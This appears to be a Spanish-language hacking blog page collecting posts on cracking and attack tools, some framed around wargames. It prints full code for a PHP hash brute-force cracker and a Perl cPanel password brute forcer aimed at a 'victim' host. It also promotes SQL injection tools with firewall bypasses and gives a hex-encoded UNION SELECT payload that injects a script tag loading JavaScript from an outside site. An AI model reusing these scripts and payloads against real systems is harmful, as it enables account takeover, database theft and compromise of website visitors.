Realizar ataques de fuerza bruta a volumenes TrueCrypt

Antes que nada debo presentarles TrueCrypt para quienes no lo conozcan, es un Software que nos permite encriptar archivos haciendo uso de diferentes algoritmos de cifrado. Lo que más me gustó de este aplicativo es que nos permite crear volúmenes virtuales (como si se tratase de otro disco más en nuestro computador) que en realidad no es más que es un archivo con extensión .tc el cual después de poner la contraseña correcta se “monta” para poder ser usado y así es mucho más sencillo y rápido administrar los archivos del mismo.

En un reto que vi hace algún tiempo para un Wargame, había que realizar un ataque por diccionario a un volumen TrueCrypt y así fue que di con true.crypt.brute, que también puede ser útil en caso de olvidar la contraseña del .tc con archivos importantes. Eso si hay que tener en cuenta que se necesita un buen diccionario y que no es del todo efectivo el ataque, ya que como he visto en algunos casos de personas que usan 50 o más caracteres en su contraseña, haciendo imposible dar con ella usando un diccionario. Otro detalle es que el proceso es muy lento, hay que tener paciencia.

Descargar true.crypt.brute.

Cracking hash with PHP

PHPCracker: Crackear diferentes tipos de hash con PHP

Últimamente resolviendo algunos retos me ha tocado crackear diferentes hash y aunque existen muchos programas para esa labor (como Cain) estos no ofrecen soporte para realizar fuerza bruta a algunos tipos de hash. Por esta razón hice PHPCracker, un sencillo script que permite realizar ataques por fuerza bruta y ataques por diccionario usando PHP.

<?php

if (defined('STDIN')) {
        if (count($argv) < 2) {
            echo "#########################################################################\n" .
            "#           PHPCracker UrbaN77 www.RedInfoCol.org  - www.BrianUR.info   #\n" .
            "#########################################################################\n" .
            "# Uso: php phpcracker.php [Modo] [Nombre del hash] [Hash] [Opciones]    #\n" .
            "# --------------------------------------------------------------------- #\n" .
            "# Modo: usa -b hacer un brute force o -d para un ataque por diccionario.#\n" .
            "# Nombre del hash: Por ejemplo md5, sha1 o cual sea el nombre.          #\n" .
            "# Hash: Hash a crackear.                                                #\n" .
            "# Opciones: Estas dependen del modo elegido.                            #\n" .
            "#  - Charset: min para minusculas, may para mayusculas   o all para las #\n" .
            "#             anteriores con numeros y simbolos (Solo para el modo -b). #\n" .
            "#  - Diccionario: nombre del fichero de tu wordlist (Solo para modo -d).#\n" .
            "#########################################################################";
            exit;
        }
        $modo = $argv[1];
        $tipoHash = $argv[2];
        $hash = $argv[3];

        function crackear($hash, $tipoHash, $charset) {
            if ($charset == "min") {
                $desde = 97;
                $hasta = 122;
            } elseif ($charset == "may") {
                $desde = 65;
                $hasta = 90;
            } elseif ($charset == "all") {
                $desde = 33;
                $hasta = 126;
            } else {
                echo "Necesitas especificar el Charset: min, may o all.";
                exit;
            }
			echo "Crackeando...\n";
            for ($i = $desde; $i <= $hasta; $i++) {
                for ($j = $desde; $j <= $hasta; $j++) {
                    for ($k = $desde; $k <= $hasta; $k++) {
                        for ($l = $desde; $l <= $hasta; $l++) {
                            $salida = hash($tipoHash, chr($i) . chr($j) . chr($k) . chr($l));
                            if ($hash == $salida) {
                                echo "Password encontrado: " . chr($i) . chr($j) . chr($k) . chr($l)."\n";
                                exit;
                            }
                        }
                    }
                }
            }
        }

        if ($modo == "-d") {
            $wordlist = $argv[4];
            if (file_exists($wordlist)) {
                $diccionario = file($wordlist);
				echo "Crackeando...\n";
                foreach ($diccionario as $rel) {
                    $salida = hash($tipoHash, $rel);
                    if ($salida == $hash) {
                        echo "El password es: " . $rel;
                        exit;
                    }
                }
            } else {
                echo "El archivo " . $wordlist . " no existe.";
                exit;
            }
        } elseif ($modo == "-b") {
            $charset = $argv[4];
            crackear($hash, $tipoHash, $charset);
        }
        echo "Password no encontrado :/ intenta probando con otro tipo de hash, otro charset o diccionario.";
} else {
    echo("Necesitas correr este script desde la consola.");
}
?>

Continuar leyendo…

Herramienta para analisar imaganes

StegSecret: Herramienta para estegoanálisis

Herramienta para analisar imaganesStegSecret es una interesante herramienta para estegoanálisis de imágenes en busca de información oculta, comprobando diferentes tipos de técnicas comunes y patrones usados por programas como camouflage, inThePicture, inPlainView, steghide, dataStealth y entre otros más. Muy útil para wargames cuando necesitas saber rapidamente el tipo de tecnica de un reto de esteganografía antes de ponerte a comprobar manualmente.

Programas y técnicas detectadas

  • camouflage V1.2.1, inThePicture v2, JPEGXv2.1.1, PGE (Pretty Good Envelope) v1.0, appendX v<=4, steganography v1.6.5, inPlainView, DataStash v1.5 y dataStealth v1.0.
  • Programas basados en  técnicas EOF (End Of File).
  • Suporta los formatos BMP, GIF y JPEG.
  • Cuenta con una Base de Datos de Aplicaciones Esteganográficas “bdas v0.1” con más de 40 tipos de técnicas esteganográficas.

En resumen una herramienta que no puede faltar en el repertorio.

Sitio web y descarga de StegSecret.

Cain & Abel: Una herramienta todo en uno

Cain & Abel es una de mis herramientas preferidas en entornos Windows, ya que dentro de una misma aplicación podemos hacer montones de cosas como recuperar contraseñas del sistema donde este instalado, entre ellas contraseñas Wi-Fi, de Internet Explorer, clientes de correo, Microsoft Access y más. También cuenta con sistema de crackeo de múltiples tipos hash, en el que permite usar técnicas como fuerza bruta, ataque por diccionario y ataque por criptoánalisis. Otra de sus características más valoradas es que permite sniffear redes, permitiendo obtener contraseñas en una red, grabar conversaciones VoIP, entre otras. Ademas cuenta con decodificador de Base64, VNC, Cisco VPN Client y otras pequeñas utilidades.

Descargar Cain & Abel también puedes descarga una versión portable.

El manual oficial lo puedes encontrar aquí o este otro en español.

Cryptool

CrypTool: Una herramienta para Criptografía y Criptoanálisis

CrypTool es una de esas herramientas a las que uno les coge cariño rápidamente, yo la llevo usando hace algún buen tiempo para resolver retos de criptografía y me a funcionado de maravilla. Esta herramienta es usada para el aprendizaje de  Criptografía y Criptoanálisis, lamentablemente  solo esta disponible para Windows pero existe una alternativa llamada JCrypTool desarrollada en Java, con la posibilidad de ejecutarse en múltiples sistemas operativos.

Entre las caracterisitcas destacadas de CrypTool podemos encontrar:

  • Numerosos algoritmos criptográficos, clásicos y modernos (cifrado y descifrado, generación de clave, contraseñas seguras, autentificación, protocolos seguros, …)
  • Visualización de varios métodos (p.ej. César, Enigma, RSA, Diffie-Hellman, firmas digitales, AES)
  • Criptoanálisis de ciertos algoritmos (p.ej. Vigenère, RSA, AES)
  • Métodos de medida criptoanalítica  (p.ej. entropía, n-grams, autocorrelación)
  • Métodos auxiliares (p.ej. tests de primalidad, factorización, codificación en base64)
  • Tutorial sobre teoría de números.
  • Ayuda detallada on-line.
  • Script con más información sobre criptografía.

Descargar CrypTool

SQL-PwnZ 1.5 – Herramienta para SQL Injection

Algunos deben recordar que anteriormente les había hablado de esta tool. Hoy me encontré en la web de Login-Root que ya esta disponible la version 1.5.

Las novedades son:

[+] Agregado mod_security Bypass.
[+] Agregado Illegal Mix Of Collations Bypass.
[+] Agregadas más tablas para bruteforce.
[+] Agregadas más columnas para bruteforce.
[+] Código interno mejorado.
[+] Bugs Fixeados.

Pueden descargarla desde aquí.
Continuar leyendo…

Cpanel Password Brute Forcer

Aquí les dejo una herramienta, el nombre lo dice todo. Esta hecha en Perl:

#!/usr/bin/perl
# Cpanel Password Brute Forcer
# ----------------------------
#    (c)oded By Hessam-x
# Perl Version ( low speed )
# Oerginal Advisory :
# http://www.simorgh-ev.com/advisory/2006/cpanel-bruteforce-vule/
use IO::Socket;
use LWP::Simple;
use MIME::Base64;

$host     = $ARGV[0];
$user     = $ARGV[1];
$port     = $ARGV[2];
$list     = $ARGV[3];
$file     = $ARGV[4];
$url = "http://".$host.":".$port;
if(@ARGV < 3){
print q(
###############################################################
#               Cpanel Password Brute Force Tool              #
###############################################################
#     usage : cpanel.pl [HOST] [User] [PORT][list] [File]    #
#-------------------------------------------------------------#
#    [Host] : victim Host             (simorgh-ev.com)        #
#    [User] : User Name               (demo)                  #
#    [PORT] : Port of Cpanel          (2082)                  #
#[list] : File Of password list   (list.txt)              #
#    [File] : file for save password  (password.txt)          #
#                                                             #
###############################################################
#            (c)oded By Hessam-x / simorgh-ev.com             #
###############################################################
);exit;}

headx();

$numstart  = "-1";

sub headx() {
print q(
###############################################################
#              Cpanel Password Brute Force Tool               #
#            (c)oded By Hessam-x / simorgh-ev.com             #
###############################################################
);
open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !";
@PASSWORDS = <PASSFILE>;
close PASSFILE;
foreach my $P (@PASSWORDS) {
chomp $P;
$passwd = $P;
print "\n [~] Try Password : $passwd \n";
&brut;
};
}
sub brut() {
$authx = encode_base64($user.":".$passwd);
print $authx;
my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "\n [-] Can not connect to the host";
print $sock "GET / HTTP/1.1\n";
print $sock "Authorization: Basic $authx\n";
print $sock "Connection: Close\n\n";
read  $sock, $answer, 128;
close($sock);

if ($answer =~ /Moved/) {
print "\n [~] PASSWORD FOUND : $passwd \n";
exit();
}
}

Realizar Jailbreak a Iphone, Ipad y Ipod Touch

Desde hace algunos días se encuentra disponible Spirit, una herramienta que permite realizar Jailbreak con un solo click al Iphone, Ipad y Ipod Touch. Cuenta con versiones para Windows y Mac OS y entre las novedades que nos ofrece este programa podemos encontrar que permite realizar Jailbreak a dispositivos con Firmware versión 3.1.3 (Iphone y Ipod Touch) y versión 3.2 (Ipad). Funciona con Itunes 9.1, ya que como algunos sabrán blackra1n anteriormente presentaba problemas con esa versión y solo se podía usar aplicando un parche. Y la característica más importante para mi es que permite hacer un Jailbreak permanente (untethered), es decir que si apagamos el dispositivo no tendremos que conectarlo al PC para volverlo a ‘hackear’.

Pueden encontrar la descarga en su sitio oficial: Spirit.

PD: Si tienen problemas usando este programa, ejecútenlo en modo compatibilidad con Windows 98.

Tutorial de como usar Spirit para realizar el Jailbreak

[youtube]http://www.youtube.com/watch?v=eFlgnfEasRQ[/youtube]

General Injection Explorer 3.0

Anteriormente publique SQL-PwnZ 1.1 una herramienta para realizar inyecciones SQL. La que les traigo hoy es más amigable y solo necesitan usar el navegador, se llama General Injection Explorer 3.0 y fue creada por PonyMagic.

[?] ¿Que es?
Básicamente es un explorador de bases de datos MySQL via SQLi, “incrustado” en la inyección.

[!] ¿Que tiene la versión 3.0?
[+] Codeado desde 0.
[+] Bypasseo de “illegal operation”, y limite de group_concat_max_len.
[+] Mejor manejo de CSS && DIVS.
[+] Peticiones realizadas con AJAX.
[+] Nueva forma de ver tablas, MUCHO mas ordenadas.

[?] ¿Como se usa?
En una SQLi, unís otro select y marcas las columnas ( id=-1 union select 1,2,3,4,5 )
En un valor que printee (que se muestre en la web), simplemente copias y pegas el código de la GIE.

(0x3c736372697074207372633d22687474703a2f2f7669727475782e636f6d2e61722f4749452f5f2e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e)

Ejemplo:
Normal: tales.php?id=-1 union select 0,1,2,3,4,5,6,7,8,9–
Con GIE: tales.php?id=-1 union select 0,1,(0x3c736372697074207372633d22687474703a2f2f7669727475782e636f6d2e61722f4749452f5f2e6a7322207479
70653d22746578742f6a617661736372697074223e3c2f7363726970743e),3,4,5,6,7,8,9–

En el siguiente gif pueden ver como funciona: